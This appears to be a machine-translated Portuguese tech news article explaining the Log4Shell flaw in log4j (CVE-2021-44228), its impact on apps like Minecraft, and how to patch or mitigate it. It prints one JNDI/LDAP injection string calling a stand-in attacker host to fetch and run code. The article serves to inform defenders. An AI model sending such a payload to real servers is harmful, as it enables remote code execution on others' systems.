Uma vulnerabilidade crítica de execução remota de código foi encontrada no log4j, uma ferramenta de registro muito popular usada pela maior parte do setor. É extremamente ruim, afeta quase todos os servidores que executam Java e é muito fácil de explorar, então você deve atualizar e mitigar o problema o mais rápido possível.
índice
- Como funciona?
- Como faço para corrigi-lo?
Como funciona?
O bug, rastreado pelo CVE-2021-44228, provavelmente afeta quase todos os aplicativos Java que usam log4j , o que é bastante considerando o quão onipresente é. Se seu aplicativo registra uma string enviada por um usuário, provavelmente está vulnerável. Em termos de exploração, é um dos piores deste ano, pois pode atingir praticamente qualquer servidor executando Java de alguma forma (embora o principal vetor de ataque possa ser mais difícil nas versões modernas do JDK, falaremos mais sobre isso). . Vamos lá. ).
Essencialmente, a exploração permite que um invasor envie qualquer string como a seguinte para seu servidor e, se você a registrar em algum lugar em seu aplicativo, seu servidor executará o código hospedado nesse endereço .
${jndi:ldap://attacker.com/a}
Funciona porque, analisando essa string de formato exclusivo, o log4j fará uma solicitação por meio da interface de diretório e nomeação Java, que eventualmente enviará uma solicitação de download para um terminal arbitrário. Baixe e desserialize o arquivo .class de forma insegura. Como as classes Java podem ter inicializadores estáticos que são executados toda vez que a classe é compilada e referenciada, isso resulta na execução remota de código arbitrário a partir de uma string curta simples. Por exemplo, um cliente pode definir seu agente de usuário para essa string ou incluí-la em uma solicitação e, quando seu servidor a registrar, acionar a exploração.
É muito terrível, marcando 9,8 na escala CVSS. Ele apenas se enquadra na pior categoria, pois apesar de horrível, não afeta nenhum recurso fora do escopo do sistema de destino (mas fornece acesso em nível de aplicativo ao servidor que executa o logger).
Afeta muitas aplicações. Por exemplo, o Minecraft foi um dos primeiros a espalhar a notícia e corrigir o exploit, pois era possível executar código em ambos os servidores e em todos os jogadores conectados a um servidor por meio de mensagens de bate-papo no jogo. Um hotfix foi lançado para o jogo para corrigir o bug.
Serviços populares como Steam e iCloud já foram considerados vulneráveis, e a empresa de pesquisa de segurança GreyNoise já detectou vários IPs executando varreduras de servidores vulneráveis.
O @GreyNoise está atualmente vendo 2 IPs exclusivos varrendo a Internet para a nova vulnerabilidade Apache Log4j RCE (um CVE ainda não foi atribuído).
Uma tag para rastrear esta atividade em https://t.co/QckU3An40q estará disponível em breve e será vinculada como resposta assim que postada.— remy (@_mattata) 10 de dezembro de 2021
Você provavelmente já está executando o log4j , pois ele está incluído em centenas de outras bibliotecas como uma ferramenta de registro padrão. No entanto, as versões do JDK superiores a 6u211 , 7u201 , 8u191 e 11.0.1 não são afetadas pelo vetor de ataque principal (usando LDAP) que está sendo explorado no momento. Isso não quer dizer que você não deva atualizar, pois o bug no log4j + JNDI ainda é grave e pode ser facilmente usado com outros vetores de ataque também.
Como faço para corrigi-lo?
Felizmente, já existe uma solução que o corrige completamente, portanto, você deve atualizar seus servidores o mais rápido possível. No entanto, isso também se aplica a aplicativos cliente, que também devem ser atualizados para esse patch crítico. Afinal, 3 bilhões de dispositivos estão executando o Java, então levará algum tempo para repará-lo completamente.
O exploit já foi corrigido no log4j para a versão mais recente, 2.15.0-rc2, então você deve atualizá-lo se puder. O patch também foi revertido para versões anteriores, dada a seriedade para usuários que podem estar presos em versões legadas.
Se você estiver usando outra biblioteca que usa log4j , ainda poderá atualizar manualmente na maioria dos casos, mas se não puder, poderá usar esse sinalizador de JVM para mitigar o problema, que simplesmente informa ao log4j para nunca buscar ao formatar mensagens.
-Dlog4j2.formatMsgNoLookups=true
- A experiência de RV social gratuita da Meta está disponível para todos
- O EndeavourOS é a maneira mais fácil de usar o Arch Linux?
descubra mais conteúdo
O que é um amplificador integrado?
Google Pixel Watch também tem detecção de queda, mas não até o próximo ano
As melhores xícaras de café aquecidas de 2022
Como automatizar seu iPhone com base na hora, atividade ou localização
"Isso deve ter sido antes do meu tempo"
Por que a NASA enviou Snoopy para a Lua? – Revisão geek
Qual foi o maior ataque DDoS da história?
Vamos relembrar outro registro que pertence à equipe de Proteção DDoS do Azure da Microsoft, que interrompeu o maior ataque de negação de serviço da história da internet em novembro de 2021: uma torrente de dados inúteis com taxa de transferência de 3,47 terabytes por segundo.
O que é um exemplo de ataque DDoS?
Exemplos de ataques DDoS
Inundação de ICMP: é enviado um grande número de solicitações ICMP, que são utilizadas para diagnosticar a qualidade de uma linha de comunicação e/ou a disponibilidade de dispositivos conectados à rede, por exemplo , quando executamos o comando ping.